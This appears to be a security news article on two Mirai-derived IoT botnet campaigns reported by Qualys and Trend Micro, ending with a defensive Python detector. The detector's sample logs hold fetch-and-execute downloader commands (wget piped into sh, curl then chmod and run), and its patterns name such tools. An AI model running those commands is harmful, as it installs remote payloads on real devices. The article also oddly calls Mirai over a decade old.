Mirai Botnet Offshoots Instigate Global DDoS Attack Surge
January 21, 2025
Two distinct campaigns are currently exploiting vulnerabilities in a variety of IoT devices around the world in order to compromise them and spread malware at global scale. These campaigns are the work of separate derivatives of the notorious Mirai botnet and are behind a new wave of distributed denial-of-service (DDoS) attacks worldwide. One campaign is exploiting specific vulnerabilities in IoT devices to build extensive botnet networks, while the other has been launching DDoS attacks on organizations in North America, Europe, and Asia since the end of 2024, according to researchers.
An ongoing operation built on the Mirai framework, known as 'Murdoc_Botnet', has been active since July and is currently targeting Avtech cameras and Huawei HG532 routers, according to a report released today by Qualys researchers. The report reveals that more than 1,300 active IPs are associated with the operation. The researchers have also identified more than 100 unique sets of servers linked to the Murdoc botnet, each of which decodes the botnet's activity and communicates with one of the compromised IPs implicated in this ongoing campaign.
In a separate study by Trend Micro, a botnet made up of malware variants derived from both Mirai and Bashlite is exploiting security vulnerabilities and weak credentials in IoT devices to launch DDoS attacks across the globe. The malware infiltrates the device by exploiting RCE vulnerabilities or weak passwords, then executes a download script on the infected host.
The two campaigns highlight the enduring impact of Mirai, a botnet that has produced numerous variants since its source code was leaked in 2016 and continues to pose a significant security threat more than a decade after it first emerged on the cyberattack landscape. The Murdoc botnet, which delivers Mirai malware, leverages existing exploits, including CVE-2024-7029 and CVE-2017-17215, to download next-stage payloads. The former is a flaw in Avtech cameras that enables commands to be injected over the network and executed without authentication, while the latter is a remote code execution (RCE) flaw found in Huawei routers. Most of the IP addresses associated with the Murdoc botnet campaign are located in Malaysia, followed by Thailand, Mexico, and Indonesia.
Researchers at Trend Micro initially detected large-scale DDoS botnet attacks against Japanese organizations, including major corporations and banks, at the end of 2024, but then traced the activity to a larger global campaign. The primary devices targeted in these attacks have been wireless routers and IP cameras from prominent brands, including TP-Link and Zyxel routers, and Hikvision IP cameras. As with the Murdoc botnet activity, cyberattackers targeted flaws in these devices to compromise them, but they also exploited weak passwords to gain access.
With Mirai variants continuing to spawn new botnets for launching new and widespread DDoS attacks, it is crucial that organizations be able to identify floods of unwanted traffic and protect their networks from them. Qualys researchers suggest that organizations regularly monitor suspicious processes, events, and network traffic generated by the execution of any untrusted binaries or scripts, and exercise caution when executing shell scripts from unknown and untrusted sources.
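As an added illustration of the monitoring Qualys recommends (this is example code written for this article, not code from Qualys, Trend Micro, or the botnet reports), the following Python script runs two simple detections over constructed log records: it flags process events where a host fetches a remote file and immediately executes it, the "download script" behaviour described above, and it flags hosts whose outbound packet rate to a single destination looks like participation in a flood. The log formats, hostnames, and addresses are invented for the example.

```python
import re
from collections import defaultdict

# Constructed sample records (not real telemetry). Process-execution events from
# IoT hosts, and per-second outbound flow counters (timestamp, src, dst, packets)
# from a gateway. Addresses come from the RFC 5737 documentation ranges.
PROC_EVENTS = [
    "2025-01-21T10:00:01 host=cam-01 exe=/bin/sh cmd='wget http://198.51.100.7/x.sh -O- | sh'",
    "2025-01-21T10:00:05 host=rtr-02 exe=/bin/sh cmd='cd /tmp; curl -s http://203.0.113.9/b.arm -o .b; chmod +x .b; ./.b'",
    "2025-01-21T10:00:09 host=cam-03 exe=/usr/bin/ntpd cmd='ntpd -p pool.ntp.org'",
]
FLOWS = [
    ("2025-01-21T10:01:00", "cam-01", "192.0.2.10", 9500),
    ("2025-01-21T10:01:00", "rtr-02", "192.0.2.10", 8800),
    ("2025-01-21T10:01:00", "cam-03", "198.51.100.20", 12),
]

# A downloader followed by execution of what it fetched: pipe into a shell,
# chmod +x on the downloaded file, or running ./<file> in the same command line.
FETCHERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
EXEC_AFTER_FETCH = re.compile(r"(\|\s*(sh|bash)\b|chmod\s+\+?x\b|;\s*\./)")

def flag_script_fetch_exec(events):
    """Return (host, cmd) pairs for events that fetch a remote file and then run it."""
    hits = []
    for ev in events:
        m = re.search(r"host=(\S+).*cmd='([^']*)'", ev)
        if not m:
            continue
        host, cmd = m.groups()
        if FETCHERS.search(cmd) and EXEC_AFTER_FETCH.search(cmd):
            hits.append((host, cmd))
    return hits

def flag_flood_sources(flows, pps_threshold=5000):
    """Return {src: peak_pps} for hosts exceeding the packets-per-second
    threshold towards a single destination within one timestamp bucket."""
    per_sec = defaultdict(int)
    for ts, src, dst, pkts in flows:
        per_sec[(ts, src, dst)] += pkts
    flagged = {}
    for (ts, src, dst), pkts in per_sec.items():
        if pkts > pps_threshold:
            flagged[src] = max(flagged.get(src, 0), pkts)
    return flagged

if __name__ == "__main__":
    for host, cmd in flag_script_fetch_exec(PROC_EVENTS):
        print(f"fetch-and-exec on {host}: {cmd}")
    for src, pps in flag_flood_sources(FLOWS).items():
        print(f"possible flood participant {src}: {pps} pps")
```

The thresholds and patterns are starting points; tune them against the baseline of the devices being monitored, since a camera fetching firmware over HTTP is normal while a camera piping a script into sh is not.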